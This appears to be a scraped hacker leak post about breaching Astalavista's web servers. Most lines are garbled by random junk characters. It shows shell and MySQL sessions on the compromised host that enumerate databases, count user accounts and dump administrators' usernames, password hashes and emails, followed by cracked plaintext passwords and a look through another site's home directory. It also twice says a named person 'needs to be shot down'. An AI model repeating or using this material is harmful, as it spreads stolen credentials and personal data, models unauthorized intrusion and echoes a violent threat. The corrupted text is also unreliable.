$ z, ?4 C& N Y0 @4 h1 | <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
# x6 m" h' l9 ^1 L </channel>" K3 V) i. k+ { r- Z
</rss>’;) \8 w8 w. A6 m/ J/ \# L, h; Q
5 E3 B5 a! k. e/ ^ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
& q" {2 o/ _3 { unlink (FULLPATH . ‘/feed/exploits.xml’);/ N, M2 j" g, c, [ E
}1 P5 v/ z* g& v/ z
% b# ?" m2 n Z) ^! u- F* V file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);0 H1 `7 _4 j. F9 x: m5 L
[snip]; k2 y( h3 P/ g; N/ C+ K
5 f: k; R) @" T6 ~: c
sh-3.2$ cat exploits.sh; w" R; ~, g: f
#!/bin/sh
% Z1 U' \( Y, @9 e4 d
# Z2 M4 i5 q" d: J###########################################################3 R2 L2 B1 b6 W& C# q3 k0 @
# #
0 L( |+ d% D7 |) B# Title: milw0rm exploits adder #5 T$ P" A# ~' i2 j- v8 E0 b0 O
# Description: Add all milw0rm exploits to the ## b* F" R7 l9 \' ] K
# Astalavista.com database #
0 t6 t- v1 x u8 H7 o* h' P# #
9 i+ w3 W1 P' w! V [7 T3 I/ V8 x$ R# Company: Astalavista Group #. b$ {* s9 o3 F$ \4 K: b
# Author: Paulo M. Santos #+ s. h# i1 R! W$ V4 b
# E-Mail: 链接标记paulo.santos@astalavista.ch #
# _. `( S, _ D& G% n, ^! y) T' H8 Z# #( @0 r! H% p* f+ g
###########################################################
3 s5 G1 H3 \$ x+ R1 i& ?7 e2 o# m7 W5 p4 g
# path
0 W( i l/ l3 h. gthis_path=/home/com/public_html/modifications/cronjobs0 a$ U3 y2 ]. G! z, e3 x9 P' G6 n
: ?, ?+ a K+ G, j6 }
# change directory
- X& Z; x9 v: Acd $this_path
( E* {0 O0 b7 k- o# S$ _ G* n1 acd tmp/. M1 u, X$ G- E" M* A1 |2 L: ]" p6 D
8 x" n& [0 g' j& v4 R. {; W. _# delete files
% i" }+ c" E6 ~. y( P% F: |% ~; }rm -rf milw0rm.tar.* &5 O% i' e5 k! s" n, i$ Q
rm -rf milw0rm/ &
2 F5 y& }9 R. k4 }
1 ^* I* P! S# `' r* P& r. X# wget milw0rm paket. h" k$ c& \/ ?2 k v- Y& _
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
& H) Z. J. J% E# I5 O' |* g
9 k K Y6 E. {. }. ~# extract milw0rm paket
' ?0 y: Y1 ~2 o8 C" atar -xvf milw0rm.tar.bz26 e' S. }* T4 {) P' u
H& E- F1 M6 z! I% M4 v- U
# change owner
1 G4 a+ P* ]" ?" _6 d xchown -R com .) x$ V" t0 d3 O+ l. w& A6 e
chgrp -R com .% a8 [7 S7 r: x2 b
7 p5 U; U1 F, e3 v U
# execute php script4 g2 f6 B1 A7 G' ^; p/ s
cd $this_path& C' H) ^! \1 w! ~& D
php -q exploits.php- J4 {; P- E6 e* v& z, }* y
+ Y& x& a) F/ C$ c/ {6 j# delete files
3 p# t0 p. U) m7 X3 u( z) arm -rf tmp/milw0rm.tar.*
( d+ A: V* }+ F. E. |- o7 Q1 orm -rf tmp/milw0rm/' Y, v, q2 N3 E( \ a" g8 d. Q! i
. U) v/ v' u5 ^. N8 h( \7 |sh-3.2$ echo “Paulo M. Santos needs to be shot down.”: h+ C' {" L l% ?4 U5 r
Paulo M. Santos needs to be shot down.
6 [$ R5 o |6 O3 p) N) o- l u
6 w# |7 Q* q- \: Hmysql -u contrexxuser2 -p
* |+ e- w( N8 u: V' LEnter password:2 U9 }/ m8 \$ e5 W; A- j6 D
Welcome to the MySQL monitor. Commands end with ; or \g.
# s* Z% H5 C) K' n9 @( N( GYour MySQL connection id is 2616940 |, r0 o+ z+ \) X/ c7 X! ]& | }7 d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
) o. ^2 C- i2 E
& h% c; M. h, V# TType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, y( G0 y, j+ g Y8 m Z2 R2 q* G0 W- ]; G+ U( _( ]
mysql> show databases;
: E9 G6 r7 Z `; n8 f3 w8 {+——————–+) } Q( K9 ?" r; N6 i
| Database |7 `# r% O. i! l4 |' h
+——————–+3 R+ o& W% c. t2 K
| information_schema |8 s$ H/ w8 o7 Q6 T/ X/ y6 Z
| com_contrexx2 |
0 [3 p6 @9 c" o# k$ Z# [. h| com_contrexx2_live |
" v! ^1 H) H- ] v4 l5 j2 [% ]| test |& ?% O) C2 S5 @$ x. M% Y" v$ u( h& o o
+——————–+) J' C& D* ]% k7 r9 g1 n6 j
4 rows in set (0.00 sec)
7 K3 X. d, M( |) I& |
" U7 ?$ u3 S, V; h. lmysql> use com_contrexx2_live5 }, S' `/ [; L$ W; p
Database changed
9 x2 F# K' G4 \$ cmysql> show tables;
9 D1 a& v5 p0 A+ t8 b- j4 i+————————————————–+
- B0 X+ }7 p U1 u8 ^" M, m) g| Tables_in_com_contrexx2_live |
3 R! B' k5 z7 U+————————————————–+5 x d; }( @/ _$ b: B7 X3 f
| cc_banner_counter |
" n2 ~% B x m/ x| cc_search_counter |) V; v: l- V: j- _9 b+ E
| contrexx_access_group_dynamic_ids |
, k# T2 r# Q. J4 W| contrexx_access_group_static_ids |2 v3 D }7 F$ d8 J" p$ x7 ?/ P
| contrexx_access_rel_user_group |$ H3 s4 _5 H" A0 O1 _
| contrexx_access_settings |
4 C' n( K9 C E/ {% _- I( R| contrexx_access_user_attribute |1 V! Z; ~* ?9 p
| contrexx_access_user_attribute_name |& S" e. E- B% V0 X1 P9 V' k& l
| contrexx_access_user_attribute_value |
4 Q! _& Q" h8 P$ {# P; P, _% _# E1 x) H| contrexx_access_user_core_attribute |
6 B9 F) p. ~1 V/ b1 Z, H| contrexx_access_user_groups |
0 o R/ i' N" {* G, F) w| contrexx_access_user_mail |
, q6 w: g8 c3 Z: S. M% h| contrexx_access_user_profile |/ }6 D; l& q/ F/ @ I
| contrexx_access_user_title |
! L/ n! h+ h+ n9 P" ]| contrexx_access_user_validity |' J4 U+ e: o$ G6 j% |" b! Z2 c* `, G1 Y1 B
| contrexx_access_users |
8 K) l/ F; N+ `7 x, d) m% D, c| contrexx_backend_areas |
3 q9 s R/ h, I* ~3 S$ \6 J) H( q- Y| contrexx_backups |) r! K9 i \* N6 @, \& }" ^2 |
| contrexx_content |, {7 z6 D# D$ R9 e& v
| contrexx_content_history |
2 D/ K" J i; s m5 j& p) d| contrexx_content_logfile |
% T& P* b n4 G2 a- [% k| contrexx_content_navigation |5 n' Q& t& h$ \% l1 Y) `
| contrexx_content_navigation_history |; X+ q# C: }' l& \5 i* ~4 e
| contrexx_ids |( e- Z: X3 s* V2 N L% I, I
| contrexx_languages |
$ R5 u: T7 f8 L0 Z| contrexx_lib_country |
: {$ A, `( S5 K+ A8 C| contrexx_log |
/ M- h8 Y+ C- B) P {7 v7 i* L" u7 A| contrexx_module_alias_source |
5 Q; n% h) `! h# f! a+ K| contrexx_module_alias_target |
/ o6 `5 m/ f* v* m( C4 V| contrexx_module_block_blocks |2 e, G4 r) }0 v8 z9 F4 ]/ G/ D
| contrexx_module_block_rel_lang |
6 ^( Y( L) Z4 ~% O3 q- {$ @| contrexx_module_block_rel_pages |
, q9 S# }9 j8 i* w: S( ?| contrexx_module_block_settings |( }, \4 v$ y! f4 I! ^! D+ @
| contrexx_module_blog_categories |
0 _+ L) B* L. r| contrexx_module_blog_comments |7 l: B- y, ]; t6 q: d5 {# s7 W
| contrexx_module_blog_message_to_category |/ L9 i/ L3 _' W. z% _. g
| contrexx_module_blog_messages |( F1 Y+ l) ~+ b/ N! S0 U& e2 |
| contrexx_module_blog_messages_lang |3 {3 w- z" O* r
| contrexx_module_blog_networks |- |8 f! y3 G. \1 n& S
| contrexx_module_blog_networks_lang |
1 T2 y% c/ B2 M7 O| contrexx_module_blog_settings |
7 G& ^7 O% l& v# i% _1 `| contrexx_module_blog_votes |: i) P# f3 H. _
| contrexx_module_calendar |
9 F; f8 i# d& E7 M; v9 M) [- F! E| contrexx_module_calendar_access |
6 ?* L4 C9 _6 I. z; x| contrexx_module_calendar_categories |
6 b# x! g# K- l& Z b| contrexx_module_calendar_form_data |
3 @% |+ C4 ?0 z2 V/ }| contrexx_module_calendar_form_fields |5 K: V1 P- Q, ^9 _+ c
| contrexx_module_calendar_registrations |
7 a. j) ^% ^) Z4 M3 [| contrexx_module_calendar_settings |0 } X- f( p9 X3 j4 {5 k
| contrexx_module_calendar_style |
1 p2 |/ T* X; M" ?1 L* o| contrexx_module_contact_form |* R2 H( k/ H1 b+ d3 A& J H/ Q/ ]
| contrexx_module_contact_form_data |
: L$ X B* A' s+ m, N! c| contrexx_module_contact_form_field |
; Y; ]( p1 _+ G% A2 ~| contrexx_module_contact_settings |* ]9 T- N# \: x; e3 }
| contrexx_module_data_categories |# `# k/ ?! `; j& D8 `: ?6 s
| contrexx_module_data_message_to_category |3 w; A/ ^0 j- j0 |! ^ D$ o
| contrexx_module_data_messages |
% m* A1 F, S1 N9 `/ A| contrexx_module_data_messages_lang |9 p" ^- P* X' M1 x- K$ J
| contrexx_module_data_placeholders |
% k7 q0 }# V' R" `6 P7 z$ w2 x1 m# q3 h- i| contrexx_module_data_settings |
# l5 p6 D x4 U8 \0 D| contrexx_module_directory_access |7 P7 W, v4 f8 ]* { A: ~
| contrexx_module_directory_categories |
/ F" W; m# ?9 X: g) w4 D| contrexx_module_directory_dir |+ g6 T% `6 s" T
| contrexx_module_directory_inputfields | |- t& {1 E% X# h7 F5 p0 V0 _
| contrexx_module_directory_levels |
0 |/ |3 e' W; |5 D8 }| contrexx_module_directory_mail |. l, ?$ l5 S: w, Y9 w
| contrexx_module_directory_rel_dir_cat |" i7 X( V( @7 ?
| contrexx_module_directory_rel_dir_level |
" J! r5 }) r- S/ S| contrexx_module_directory_settings |* `1 C5 Q, L( e( Q& k3 K
| contrexx_module_directory_settings_google |
, w- ?% C5 e- t8 c$ |5 @| contrexx_module_directory_vote |1 Q. K7 c6 q' c0 v8 x! ?) ?" x
| contrexx_module_docsys |
+ i9 A& }# `0 D: r1 || contrexx_module_docsys_categories |7 {! r3 e( \; w# R
| contrexx_module_egov_configuration |
- i& t* F: E( q+ W& C| contrexx_module_egov_orders |+ e; q0 a( f( |8 g$ t$ h" D
| contrexx_module_egov_product_calendar |
/ N5 ?. ]0 ~2 y4 `+ M v| contrexx_module_egov_product_fields |
/ X' o) E/ R! O2 M| contrexx_module_egov_products |
9 X% R0 Z3 p: s6 t4 K0 }| contrexx_module_egov_settings |) L' M# O7 a; N
| contrexx_module_exploits |5 a! r$ I3 j; l2 |2 c8 a4 C
| contrexx_module_exploits_categories |
* B; a: ~$ w( s; ~/ r| contrexx_module_feed_category | a1 y# C* e( I7 k2 a; M- X
| contrexx_module_feed_news |4 I( A9 k7 S9 c4 S! \. s" W( y" c2 ~& |
| contrexx_module_feed_newsml_association |
7 M) b5 I, v1 C! u7 ]6 W| contrexx_module_feed_newsml_categories |
! R" @9 q) ]$ {% G) Z* o- r| contrexx_module_feed_newsml_documents |
8 k: D8 M! P& d& T4 X3 k| contrexx_module_feed_newsml_providers |3 ^& o7 m3 q: {: A
| contrexx_module_forum_access |
( X5 C0 _/ ?% E7 f% T- k| contrexx_module_forum_categories |
8 y0 Y" U# b4 g' u5 U2 b0 `: f| contrexx_module_forum_categories_lang |
* T& s* e5 s8 c* Z| contrexx_module_forum_notification |; w$ x# E- U, H+ L
| contrexx_module_forum_postings |0 h$ s7 J) Y* _: U- T2 Q1 [
| contrexx_module_forum_rating |0 p. g$ U% i0 A
| contrexx_module_forum_settings |2 y% ^, d3 F* w* j; Y& l
| contrexx_module_forum_statistics |
% i6 y! r U2 u0 i' P( S; \| contrexx_module_gallery_categories |
+ a, ] W9 ]2 ?( F9 L" R! t| contrexx_module_gallery_comments |
$ F, ^0 N S# O' o0 V# w8 t# A| contrexx_module_gallery_language |
' ^( t. y5 Y/ o# j9 h| contrexx_module_gallery_language_pics |
% o R' g; D# B) y! P0 y% r| contrexx_module_gallery_pictures |
% O: t* ?( K9 e2 M' {| contrexx_module_gallery_settings |8 ]7 n# h& d& x+ H6 l6 j, d
| contrexx_module_gallery_votes |' Q) b( K+ P" d$ c
| contrexx_module_guestbook |) h" N. v1 D, Q4 @0 R( r+ H
| contrexx_module_guestbook_settings |
5 l/ [' F' x! u# D5 n| contrexx_module_livecam |2 L! w; E/ U. D/ W1 Z8 A# w
| contrexx_module_livecam_settings |
5 t/ y8 P5 i7 S5 e* R2 A' k| contrexx_module_market |- R- z9 Q9 t3 z2 d
| contrexx_module_market_access |% X+ n5 x. g2 g u# [
| contrexx_module_market_categories |
6 C$ _, w- M0 d( t4 Q4 Z/ k7 F| contrexx_module_market_mail |; t6 c. K6 E+ u: L. u
| contrexx_module_market_paypal |* h# N; w5 Y' b7 e
| contrexx_module_market_settings |. X5 ~! C$ r- G
| contrexx_module_market_spez_fields |3 k- k) T# x2 ?2 @
| contrexx_module_mediadir_access |! k; H4 ?8 F! D
| contrexx_module_mediadir_categories |; u( Z( t9 ]- m
| contrexx_module_mediadir_comments |
- u$ j4 b9 H5 s( h3 z| contrexx_module_mediadir_dir |* N% [6 f' {% n2 N- e- q, K: `5 k
| contrexx_module_mediadir_inputfields | J! v2 Z) e7 n
| contrexx_module_mediadir_levels |
+ ^' p! {9 M8 {# f| contrexx_module_mediadir_mail |
. p0 b6 j3 x: B/ q8 C6 j) E0 Q8 n| contrexx_module_mediadir_rel_dir_cat |9 X" m: E5 f; L# F) c
| contrexx_module_mediadir_rel_dir_level |5 \& {# @! p% k$ \
| contrexx_module_mediadir_reports |
% k# p) h0 ?1 o b* N8 P# ]4 || contrexx_module_mediadir_settings |6 Y2 \" W# h( a% \! m6 B9 D( m& o
| contrexx_module_mediadir_settings_google |
. r+ j. i0 t5 x8 ?2 u/ p+ k1 j0 I$ Q| contrexx_module_mediadir_vote |& Q& g+ C6 o3 y% q, }8 V# {
| contrexx_module_memberdir_directories |5 i. L5 n$ x- x, w
| contrexx_module_memberdir_name |( m- f# C0 q0 D, c6 _7 u
| contrexx_module_memberdir_settings |) Y4 ? V, n. ^1 J9 W/ j
| contrexx_module_memberdir_values |3 s I& l' d3 p/ M
| contrexx_module_nettools_allowed_groups |
! I: F) [* p i) f6 T ` B| contrexx_module_nettools_settings |
+ Q* X. S5 p* {. |) o! a| contrexx_module_news |
( {( h. M' ?* m# x& T| contrexx_module_news_access |) S) C; W6 z( D; Q) g5 G$ @8 o
| contrexx_module_news_categories |
6 z- l& _+ d h& w: |6 G| contrexx_module_news_settings |& x; T; O2 h& ~+ D+ P7 w3 h
| contrexx_module_news_teaser_frame |7 C+ `5 }* N4 ~" n+ V
| contrexx_module_news_teaser_frame_templates |) N" x; |+ i7 u
| contrexx_module_news_ticker |
3 ?9 u r$ K$ z6 h. W/ o* D7 v| contrexx_module_newsletter |- G* K4 |+ a# G3 J6 p
| contrexx_module_newsletter_attachment |
) x2 R- H2 z, n2 |* t5 ?' G3 f3 u0 P& g| contrexx_module_newsletter_category |
4 L* \& m! x$ i! S| contrexx_module_newsletter_confirm_mail |
, N. B+ k. u9 e% L H| contrexx_module_newsletter_rel_cat_news |
8 o; ?9 u1 r: x$ ?* W| contrexx_module_newsletter_rel_user_cat |
6 ?+ ^( }- Y% l| contrexx_module_newsletter_settings |' i) k6 C: W# o6 n' j; D
| contrexx_module_newsletter_template |
& ?% E! @% }# l: f6 ^/ }| contrexx_module_newsletter_tmp_sending |$ j! v/ f* W: d: N
| contrexx_module_newsletter_user |
$ o9 b. a! x% m; A# l5 l( ]/ Z| contrexx_module_newsletter_user_title |
/ h9 R! G+ M5 b8 T% z| contrexx_module_onlinetools_defaultports |: ~0 ?9 ~+ F" A) u& b
| contrexx_module_onlinetools_defaultports_back |
" K" P- }& }5 }$ q| contrexx_module_onlinetools_geolitecity_blocks |
9 G6 ?- d+ {" u7 F% M| contrexx_module_onlinetools_geolitecity_country |; P7 }0 z+ _7 y' y7 n" ]: W- o7 Z
| contrexx_module_onlinetools_geolitecity_location |
9 g# v& K! U: `: k| contrexx_module_podcast_category |# l7 ~8 D! ^' @: M6 f
| contrexx_module_podcast_medium |( F7 ?6 O# K, W ?( |
| contrexx_module_podcast_rel_category_lang |$ t" I9 Y2 v7 E# u+ d: g3 \
| contrexx_module_podcast_rel_medium_category |* H3 |" ]$ q9 |3 |; H$ j" A
| contrexx_module_podcast_settings |7 K" N/ z* p" v% y" Y0 t
| contrexx_module_podcast_template |
1 ?* U. z4 G, Z* f0 h; q8 s| contrexx_module_proxydb |- ^8 S& O* l: _8 F$ e
| contrexx_module_recommend |
9 V3 `7 K+ ^" L) b| contrexx_module_repository |
8 o7 Y' d' P5 A2 |4 S+ H| contrexx_module_securitynews_cats |9 @& F. r* f9 x4 q, o% b; K
| contrexx_module_securitynews_feeds |) v1 h5 L0 N9 A& K8 Z
| contrexx_module_securitynews_news |: D! H2 m; s) {4 r6 ?
| contrexx_module_shop_categories |
% J( c7 m0 g' X4 ]% r# x- C| contrexx_module_shop_config |
- ~6 H* U7 C1 N5 J9 p" a0 b r8 ~. [| contrexx_module_shop_countries |
) f: R* @! d" Z/ P t| contrexx_module_shop_currencies |! y" ~/ r6 [7 S$ b/ b* M; h- _
| contrexx_module_shop_customers |
5 _+ B7 m( \, ]3 ^# J$ q| contrexx_module_shop_importimg |, E/ t! u5 h( I4 H: s
| contrexx_module_shop_lsv |
5 W6 e: ~: P0 T2 f$ L$ [+ J- b| contrexx_module_shop_mail |
7 j# U7 e; Q) G' b) C) @| contrexx_module_shop_mail_content |
% @% H- g3 J8 }6 S5 y2 F| contrexx_module_shop_manufacturer |1 h! f# f) K* a& o- K
| contrexx_module_shop_order_items |
+ t0 h5 v+ @4 n# c* g; X| contrexx_module_shop_order_items_attributes |
+ ~& [) t# Q! i1 p; G/ X. p| contrexx_module_shop_orders |# g C! K5 W/ V. s( }8 U; h* v
| contrexx_module_shop_payment |
. o, n* F# ?' o- a# j: v& U| contrexx_module_shop_payment_processors |# {6 n& v* \# S! H7 g8 ]' f
| contrexx_module_shop_pricelists |1 r$ q, [# I' ^( N
| contrexx_module_shop_products |
) g: p5 S1 T0 X| contrexx_module_shop_products_attributes |6 B; h. p1 f7 e* Y; [ \" |
| contrexx_module_shop_products_attributes_name |
- S) a# z6 r, W4 N2 V1 g| contrexx_module_shop_products_attributes_value |
# A) g# i/ z0 g, t& _| contrexx_module_shop_products_downloads |; Y2 u% n& W/ U% R8 p
| contrexx_module_shop_rel_countries |1 C0 q" [( X4 p& m1 i/ M
| contrexx_module_shop_rel_payment |, k3 j8 C, {0 y! w
| contrexx_module_shop_rel_shipment |, Q+ L+ q0 ?0 ~- Y
| contrexx_module_shop_shipment_cost |
. H2 b5 c: e+ F1 a+ `4 M+ m1 O| contrexx_module_shop_shipper |
" n6 q3 C& [) o7 T, p, }| contrexx_module_shop_vat |
+ d9 {3 ]9 j5 G$ J" \. P8 a| contrexx_module_shop_zones |
2 U5 A4 \$ N- \+ D: ?1 r/ x| contrexx_module_u2u_address_list |
0 r1 J3 p$ U; s| contrexx_module_u2u_message_log |
; X( X7 Q# F0 O8 S| contrexx_module_u2u_sent_messages |9 v+ n0 [+ m6 ~( r
| contrexx_module_u2u_settings |4 k" g9 x: }" ^$ l \# D, A$ I
| contrexx_module_u2u_user_log |
# v3 }% e" H" s5 Z, n7 ~' V8 z9 f| contrexx_modules |
' X: L* D. z% P9 @8 G+ a6 _| contrexx_sessions |$ a$ [7 E2 g' `3 ~0 _" s5 I
| contrexx_settings |
3 S4 d* b9 k/ L# r- n7 e; M7 O| contrexx_settings_smtp | \/ K0 }& z# G0 A1 V# |! J' z( M
| contrexx_skins |" K3 i, y3 |" w7 R8 J2 u2 C
| contrexx_stats_browser |4 V5 ?5 K( x2 A# d
| contrexx_stats_colourdepth |
# b7 Y9 Y9 ]! L% || contrexx_stats_config |, w% J9 i1 S6 E$ _
| contrexx_stats_country |: A1 c. X! G2 t S$ o
| contrexx_stats_hostname |+ P4 v2 t; ^+ i. D! m. N. C. R
| contrexx_stats_javascript |
D) ]+ V% v% U& V2 F) B6 y" t| contrexx_stats_operatingsystem |
+ a% w3 C) A7 j. l0 r& C# K| contrexx_stats_referer |( A0 j' ]7 v5 p% b! o# X& |
| contrexx_stats_requests |' g& x8 d1 q$ h Q
| contrexx_stats_requests_summary |# m# f, x0 t s; L, V4 c0 P3 G" }
| contrexx_stats_screenresolution |- I0 b& h7 ^6 A
| contrexx_stats_search |
/ Z$ }$ T3 }; V. f+ v* p| contrexx_stats_spiders |
2 W4 T. K4 @/ X7 X: Q* ~! @| contrexx_stats_spiders_summary |0 u* {3 {2 G2 |9 B
| contrexx_stats_visitors |
7 Z1 M0 L1 k* g; `| contrexx_stats_visitors_summary |
8 r) W) u/ G* E. Q' x| contrexx_voting_additionaldata |! O3 J0 _ C p- d2 s% a; ?
| contrexx_voting_email |
" ` O- w0 C) W: ~| contrexx_voting_rel_email_system |! I7 H6 I; S: t" p! ]" E5 w
| contrexx_voting_results |
. c. x: q8 d4 \9 A1 i| contrexx_voting_system |
4 v- z2 y9 V( x| foo |
: [) G; t3 H8 w/ u6 A+————————————————–+
- o* p- N6 d! o& ], y& ]227 rows in set (0.01 sec)+ C6 h& E2 Q/ e m+ V2 E
$ B3 I( I0 O4 y( l! F4 l. s
mysql> select count(*) as skids from contrexx_access_users;: S! q4 j/ z3 B' T
+——-+7 Z+ b" U/ T5 d0 f
| skids |0 B6 \$ o* E* a
+——-+
4 S4 |. U& U) _, ?| 53699 |
* A; ~9 \, {' |+——-+
# K5 y6 v% [4 W1 row in set (0.00 sec)' ] D X' ^# p2 p0 h$ C
7 X C7 c, v! d6 fmysql> describe contrexx_access_users;# Y, @) o7 C* c7 O& \: Y) R S* F
+——————+——————————————+——+—–+————–+—————-+
8 N4 v' n2 P' e+ H, O: }' y# X+ m| Field | Type | Null | Key | Default | Extra |
4 T2 g" f* j0 ?$ h+——————+——————————————+——+—–+————–+—————-+; Y8 j% z6 n9 l1 a1 M& S; V
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
5 n# R$ L# a9 s, s& \# K| is_admin | tinyint(1) unsigned | NO | | 0 | |
8 s @2 a2 \6 A9 a3 k Z) v' |1 N| username | varchar(40) | YES | MUL | NULL | |
8 J- J8 B" s" g. z5 U| password | varchar(32) | YES | | NULL | |6 E8 e+ k7 o* r. F3 L% \1 ?
| regdate | int(14) unsigned | NO | | 0 | |) Z/ [( t q& L
| expiration | int(14) unsigned | NO | | 0 | |: u6 Y6 ]) W+ ^# T; |
| validity | int(10) unsigned | NO | | 0 | |% ?, T! M+ g5 G0 S8 {3 F
| last_auth | int(14) unsigned | NO | | 0 | |2 O& p: h4 L4 R' M. @& d/ a6 L |
| last_activity | int(14) unsigned | NO | | 0 | |
; A. r% P* Y! ?; S' k: Q; `! Z, ~| email | varchar(255) | YES | | NULL | |
: A* d7 Y" q3 W: z: H- ]| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
: Z% R2 z) {8 Y# r5 g: g| frontend_lang_id | int(2) unsigned | NO | | 0 | |
- J. _1 q& q3 e1 T& V. f' ]0 |3 Q| backend_lang_id | int(2) unsigned | NO | | 0 | |1 }6 g( w8 N; ~; F8 b' d* @8 _: ?
| active | tinyint(1) | NO | | 0 | |
! Q$ `6 N6 a# x| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |4 ]0 y8 G) Y, w
| restore_key | varchar(32) | NO | | | |
2 E7 P E5 s4 k0 B| restore_key_time | int(14) unsigned | NO | | 0 | |/ u' ~, q3 ^+ {% ?" n0 d
| u2u_active | enum(’0′,’1′) | NO | | 1 | | e! u5 B( h. s1 K; o; N
+——————+——————————————+——+—–+————–+—————-+$ ^! ^0 L. g3 H- C( o! k9 m
18 rows in set (0.00 sec)$ |6 I: |4 ` g) G1 X8 F& l
" c) j, E8 U) s
mysql> select username,password,email from contrexx_access_users where is_admin = 1;% C1 W% y6 |5 j1 t+ \* X9 ^+ t
+————+———————————-+—————————–+
; [5 z$ [* Z2 E! u| username | password | email |' V6 s' D, q5 O2 A+ @+ H
+————+———————————-+—————————–+
( S" ^* a' @0 _* j9 L" y, b- M. n| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
/ C) H6 Q* q. ^* x4 r! D3 || prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |3 H1 ]2 T5 D0 `" t
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |# R( J6 U- Q. B
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |- ?+ z' M2 f. i8 h( J! h
+————+———————————-+—————————–+
. P( l7 h+ I$ b/ Q4 rows in set (0.04 sec)
1 }8 U- t. V" E9 P) E& d( S
- }! x/ N3 g- k% N) b8 kmysql> exit;
$ Z X, v9 |9 o& F( ]3 nBye
& V( Z. M0 i5 q1 i. ^& ~
+ c5 ]- u- D8 l[~] There you go, your “team of security and IT professionals” is a joke.0 ]- Y, J/ e$ U0 P, E
: x+ ~$ y6 }+ p6 C
+——————————+5 e* X6 m) f. i: p! U0 @( Q* o
system:f82BN3+_*0 u! k4 R3 y9 [
Be1er0ph0r:belerophor4astacom2 h R# T% d: H+ B2 a
prozac:asta4cms!
# v& [; K, L. V5 Scommander:mpbdaagf6m9 t( _0 {! `6 K: j1 q+ ~; @
sykadul:ak29eral, Z. V) |% y3 g. ~9 k0 A' U1 O
+——————————+
|0 C; Z/ \1 c9 A7 e) L2 y; i( t5 {: }% L; M: E4 w9 I
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s): A6 f* ~+ ^0 k3 L8 c4 l
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.7 O8 @2 N4 j+ `$ q) i- ~
. R# R# |8 `% h1 Y[~] Lets move to astalavista.net now,
2 ]& x( i& P' \4 t, v Q9 G4 E9 ~( G$ P* ^" u$ R! z K9 T+ U& {
From <链接标记[url]https://www.astalavista.net/[/url]>:
8 S; ~7 C( y$ f+ Q5 E* H>> Everyone knows that the best defense is a good offense.2 y" w- H. W8 }, f$ F
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.& u% Z" E( b* l. J6 @- `, {5 `
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.. q8 w8 [& J/ N1 D
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”6 v$ T0 h: c& \4 u% i# I% z- {
! {; w" I. |' u0 `9 N) t>> Go ahead, try and hack our server . in a completely legal way!% H! }" E- V0 o' G1 {, p
>> Learn by doing: We offer our members tricky tasks and challenges on an, V# Q* S) r' z9 g& p: D
>> ongoing basis so you can test your knowledge and abilities. You can also
! M6 [& f% O8 h& `6 K>> demonstrate what you.ve mastered by taking part in regular hacker contests
5 u6 Q# l. F7 V) k3 }>> and war games
2 @# e, J' q9 k7 ~$ Q$ N
/ i3 C7 u3 W$ t% c9 g) E, x0 f[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
/ R& Y; k" m) R2 X, P5 a3 r+ m7 d
# @. W# e$ T" E0 ]4 @# ^[-] Tricky task: Find home dir of astalavista.net. g+ h; ?+ n$ X( S2 b
( z0 T7 I" `- I+ l) k' O
sh-3.2$ ls -la ~astanet6 ]- g5 H' e/ O$ E+ D
total 48( m1 H) d! k" A) A' D4 K# {
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .$ Z8 A: L; I( d. I5 _6 M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 N3 x- R' |% K' p9 r# O
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth- M. N3 i6 q4 q* r- J3 L
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history% a+ Q' Y! L& P* X
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout/ r S6 C6 G% U$ P$ o
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile+ ~( X X. Z# H8 n
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
* J- B, D6 @9 G- O, o+ V# vdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains) K, C- v9 G2 _1 G. o/ i
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap0 u8 _3 f: L5 ~' |5 T, \
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 q2 I u5 l( ^$ P$ J. o# t" ?lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
' p* }: a% G c-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; h+ U& v; x! |5 Z; }+ I' `
1 @' l* j3 C H) Q
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
# y4 k) T6 ~4 w4 E* [sh-3.2$ ls -la- `& _4 C1 m/ F: ~7 O$ n
total 200" r- j8 i8 i- h( R/ f
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ., a! r; U0 [# w' f1 c W6 t% c
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..0 z6 A# v$ V4 z+ K
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0077 a+ W, o5 h+ w: ^& M" L! a
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql2 o" s6 k6 c+ v7 A' r% y
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
